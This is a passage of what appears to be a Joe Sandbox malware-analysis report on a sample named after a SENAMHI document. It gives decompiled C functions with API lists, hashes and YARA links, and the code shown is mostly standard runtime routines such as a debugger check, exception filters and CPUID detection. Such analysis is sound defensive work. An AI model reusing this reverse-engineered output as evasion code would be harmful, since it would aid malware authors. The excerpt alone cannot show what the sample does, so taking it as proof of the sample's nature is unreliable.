Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: LibraryLoadResource$__alloca_probe_16$FindFreeH_prolog3_catch_Sizeof
String ID: 0Xv@hv
API String ID: 2027223938-821520770
Opcode ID: fe23d1d87027a50f6ec40f5f5eb4210a31a969296b9fb58005229fd9c5c9b447
Instruction ID: 5be1d29982fe879dea3c27f73d54bb78326dc868fd7a2dca692e3c1772114175
Opcode Fuzzy Hash: fe23d1d87027a50f6ec40f5f5eb4210a31a969296b9fb58005229fd9c5c9b447
Instruction Fuzzy Hash: 506163B1A40218EBCB229F64CC847ED77B5AF58301F5440E9EE29AB241DB709EC9CF55

Uniqueness

Uniqueness Score: -1.00%

Function 001571A3 Relevance: 6.1, APIs: 4, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E001571A3(void* __edx) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				struct _MEMORY_BASIC_INFORMATION _v52;
				struct _SYSTEM_INFO _v88;
				void* _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t20;
				void* _t22;
				long _t23;
				char _t24;
				long _t30;
				signed int _t37;
				void* _t41;
				void* _t42;
				signed int _t44;
				long _t46;
				char _t47;
				signed int _t50;
				void* _t51;

				_t41 = __edx;
				_t18 =  *0x169008; // 0x26a91022
				_v8 = _t18 ^ _t50;
				_t20 = 4;
				E001602C0(_t20);
				_t22 = _t51;
				_v16 = _t22;
				_t23 = VirtualQuery(_t22,  &_v52, 0x1c);
				_t53 = _t23;
				if(_t23 == 0) {
					L12:
					_t24 = 0;
					__eflags = 0;
				} else {
					_v20 = _v52.AllocationBase;
					GetSystemInfo( &_v88);
					_t37 = _v88.dwPageSize;
					_t47 = 0;
					_v12 = 0;
					if(E00159A78(_t53,  &_v12) != 0 && _v12 > 0) {
						_t47 = _v12;
					}
					_t44 =  ~_t37;
					_t46 = _t47 - 0x00000001 + _t37 & _t44;
					if(_t46 != 0) {
						_t46 = _t46 + _t37;
					}
					_t30 = _t37 + _t37;
					if(_t46 < _t30) {
						_t46 = _t30;
					}
					_t42 = (_t44 & _v16) - _t46;
					if(_t42 < _v20 + _t37 || VirtualAlloc(_t42, _t46, 0x1000, 4) == 0 || VirtualProtect(_t42, _t46, 0x104,  &_v24) == 0) {
						goto L12;
					} else {
						_t24 = 1;
					}
				}
				return E0015403C(_t24, _t37, _v8 ^ _t50, _t41, _t42, _t46);
			}

0x001571a3
0x001571ab
0x001571b2
0x001571ba
0x001571bb
0x001571c0
0x001571c9
0x001571cc
0x001571d2
0x001571d4
0x00157254
0x00157254
0x00157254
0x001571d6
0x001571d9
0x001571e0
0x001571e6
0x001571ec
0x001571ef
0x001571f9
0x00157200
0x00157200
0x00157206
0x0015720a
0x0015720c
0x0015720e
0x0015720e
0x00157210
0x00157215
0x00157217
0x00157217
0x0015721f
0x00157225
0x00000000
0x0015724f
0x00157251
0x00157251
0x00157225
0x00157267

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 001571CC
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 001571E0
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 00157230
VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 00157245

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: d975abb2164b529ef5e1a58f6a7e35f8ebf018f20572f2f75cb175e929f8d013
Instruction ID: 669127ac250a66cb13c405502ccb2bd4ee9963159db08caf3b253dc20eacdbc3
Opcode Fuzzy Hash: d975abb2164b529ef5e1a58f6a7e35f8ebf018f20572f2f75cb175e929f8d013
Instruction Fuzzy Hash: BB219572E00118EBCB20DBE5AC86AEFB7B8EF44755F050465FD26EB180D7749948C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00154959 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00154959(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00154B51(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00155210(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00155210(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00154B51(_t49);
				}
				return _t49;
			}

0x00154959
0x00154959
0x00154959
0x0015496d
0x0015496f
0x00154972
0x00154972
0x00154976
0x0015497b
0x00154993
0x00154999
0x0015499f
0x001549a5
0x001549ab
0x001549b1
0x001549b7
0x001549be
0x001549c5
0x001549cc
0x001549d3
0x001549da
0x001549e1
0x001549e2
0x001549eb
0x001549f1
0x001549f4
0x001549fa
0x00154a09
0x00154a15
0x00154a20
0x00154a27
0x00154a2e
0x00154a39
0x00154a41
0x00154a4a
0x00154a4c
0x00154a4f
0x00154a51
0x00154a5b
0x00154a63
0x00154a69
0x00000000
0x00154a70
0x00154a73

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00154965
IsDebuggerPresent.KERNEL32 ref: 00154A31
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00154A51
UnhandledExceptionFilter.KERNEL32(?), ref: 00154A5B

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 4844fbdaf0e264058503c5992c480b971a157048e3c52a5fb62f207ef10dfe63
Instruction ID: ca6c1e0e8d9ab10d1718b3268a9e81c28f5bac4bc5ced0a1580dcca568c0d650
Opcode Fuzzy Hash: 4844fbdaf0e264058503c5992c480b971a157048e3c52a5fb62f207ef10dfe63
Instruction Fuzzy Hash: 23311A75D41218DBDF10DFA4D989BCDBBF8AF08305F10419AE40DAB250EB709A888F45

Uniqueness

Uniqueness Score: -1.00%

Function 001572E0 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E001572E0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x169008; // 0x26a91022
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00154B51(_t41);
					_pop(_t61);
				}
				E00155210(_t66,  &_v804, 0, 0x50);
				E00155210(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00154B51(_t57);
				}
				return E0015403C(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x001572e0
0x001572e0
0x001572e0
0x001572eb
0x001572f0
0x001572f2
0x001572fa
0x001572fc
0x001572ff
0x00157304
0x00157304
0x00157310
0x00157323
0x00157331
0x00157337
0x0015733d
0x00157343
0x00157349
0x0015734f
0x00157355
0x0015735b
0x00157361
0x00157367
0x0015736e
0x00157375
0x0015737c
0x00157383
0x0015738a
0x00157391
0x00157392
0x0015739b
0x001573a1
0x001573a4
0x001573aa
0x001573b7
0x001573c0
0x001573c9
0x001573d2
0x001573e0
0x001573e2
0x001573f7
0x00157403
0x00157406
0x0015740b
0x00157418

APIs

IsDebuggerPresent.KERNEL32 ref: 001573D8
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001573E2
UnhandledExceptionFilter.KERNEL32(?), ref: 001573EF

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3278fb809357d35c09e4fd9140646650e8f520d177689d6d1caffda545f12d2
Instruction ID: b93d44965bbfb89fefb3f5d6a95992670ec7b1c74e1e6afa179b6b081bfa4387
Opcode Fuzzy Hash: e3278fb809357d35c09e4fd9140646650e8f520d177689d6d1caffda545f12d2
Instruction Fuzzy Hash: 1B31A475901228EBCB21DF64DD89BCDBBB8BF18311F5041DAE81CAB291E7709B858F45

Uniqueness

Uniqueness Score: -1.00%

Function 00157B8E Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00157B8E(int _a4) {
				void* _t14;

				if(E00159DF6(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00157C13(_t14, _a4);
				ExitProcess(_a4);
			}

0x00157b9b
0x00157bb7
0x00157bb7
0x00157bc0
0x00157bc9

APIs

GetCurrentProcess.KERNEL32(?,?,00157B8D,?,00000000,?,?,?,00159C0E), ref: 00157BB0
TerminateProcess.KERNEL32(00000000,?,00157B8D,?,00000000,?,?,?,00159C0E), ref: 00157BB7
ExitProcess.KERNEL32 ref: 00157BC9

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f29f8517dd6dd5c849e8238124544669d909db5391179200c2748a9a8a9949c2
Instruction ID: ff2e6f948724ff74177e3d8f1acd3a2fd916d4e0eb96721a46bd7eada80bd0cf
Opcode Fuzzy Hash: f29f8517dd6dd5c849e8238124544669d909db5391179200c2748a9a8a9949c2
Instruction Fuzzy Hash: EBE04631004148EFCF212B54ED0AE983B29EB00342B044424FC28CA531CB79DDC5CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0015FA9C Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E0015FA9C(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E0015E06F(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E0015DFDB(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x0015faaa
0x0015fab1
0x0015fab6
0x0015fabc
0x0015fabf
0x0015fac5
0x0015faca
0x0015facf
0x0015facf
0x0015fad5
0x0015fada
0x0015fadf
0x0015fadf
0x0015fae6
0x0015faeb
0x0015faf0
0x0015faf0
0x0015faf7
0x0015fafc
0x0015fb01
0x0015fb01
0x0015fb08
0x0015fb0d
0x0015fb12
0x0015fb12
0x0015fb1a
0x0015fb2a
0x0015fb3c
0x0015fb4e
0x0015fb61
0x0015fb73
0x0015fb7b
0x0015fb80
0x0015fb85
0x0015fb85
0x0015fb8c
0x0015fb91
0x0015fb91
0x0015fb98
0x0015fb9d
0x0015fb9d
0x0015fba4
0x0015fba9
0x0015fba9
0x0015fbb0
0x0015fbb5
0x0015fbb5
0x0015fbbf
0x0015fbc1
0x0015fbfb
0x0015fbc3
0x0015fbc8
0x0015fbec
0x0015fbf4
0x0015fbe8
0x0015fbe8
0x0015fbfe
0x0015fc05
0x0015fc07
0x0015fc29
0x0015fc31
0x0015fc34
0x0015fc34
0x0015fc36
0x0015fc36
0x0015fc41
0x0015fc47
0x0015fc4c
0x0015fc53
0x0015fc8d
0x0015fc98
0x0015fc9e
0x0015fca1
0x0015fca4
0x0015fcb0
0x0015fcb8
0x0015fc55
0x0015fc58
0x0015fc64
0x0015fc6a
0x0015fc70
0x0015fc73
0x0015fc7c
0x0015fc7c
0x0015fcbb
0x0015fcc9
0x0015fccf
0x0015fcd2
0x0015fcd7
0x0015fcd9
0x0015fcdc
0x0015fcdc
0x0015fce1
0x0015fce3
0x0015fce6
0x0015fce6
0x0015fceb
0x0015fced
0x0015fcf0
0x0015fcf0
0x0015fcf5
0x0015fcf7
0x0015fcfa
0x0015fcfa
0x0015fcff
0x0015fd01
0x0015fd01
0x0015fd0e
0x0015fd11
0x0015fd48
0x0015fd13
0x0015fd13
0x0015fd16
0x0015fd41
0x0015fd36
0x0015fd36
0x0015fd4a
0x0015fd52
0x0015fd55
0x0015fd74
0x0015fd79
0x0015fd79
0x0015fd7b
0x0015fd80
0x0015fd8c
0x0015fd82
0x0015fd85
0x0015fd85
0x0015fd91
0x0015fd91
0x0015fd57
0x0015fd5a
0x0015fd69
0x00000000
0x0015fd69
0x0015fd5c
0x0015fd5f
0x0015fd61
0x0015fd61
0x00000000
0x0015fd5f
0x0015fd18
0x0015fd1b
0x0015fd31
0x00000000
0x0015fd31
0x0015fd20
0x0015fd22
0x0015fd22
0x0015fd20
0x00000000
0x0015fd11
0x0015fc0e
0x0015fc1c
0x0015fc24
0x00000000
0x0015fc24
0x0015fc12
0x0015fc17
0x0015fc17
0x00000000
0x0015fc12
0x0015fbcf
0x0015fbdd
0x0015fbe5
0x00000000
0x0015fbe5
0x0015fbd3
0x0015fbd8
0x0015fbd8
0x0015fbd3

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0015FA97,?,?,00000008,?,?,0015F72F,00000000), ref: 0015FCC9

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 808dd107b3cb3e40f3bd60ae8035366d3b062ee3f12c22581ac2cd413ae17787
Instruction ID: dbe3df36ffd63a009fb15a67257469a8dbbd8174370c98206f2ea7b669e4b9a5
Opcode Fuzzy Hash: 808dd107b3cb3e40f3bd60ae8035366d3b062ee3f12c22581ac2cd413ae17787
Instruction Fuzzy Hash: 37B13931610609CFD719CF28C496B657BA0FF45366F25866CECA9CF2A1C335E986CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00154775 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00154775(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x292724 =  *0x292724 & 0x00000000;
				 *0x169010 =  *0x169010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x292728; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x292728 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x169010; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x292724 = 1;
					 *0x169010 = _t62;
					if((_t85 & 0x00100000) != 0) {
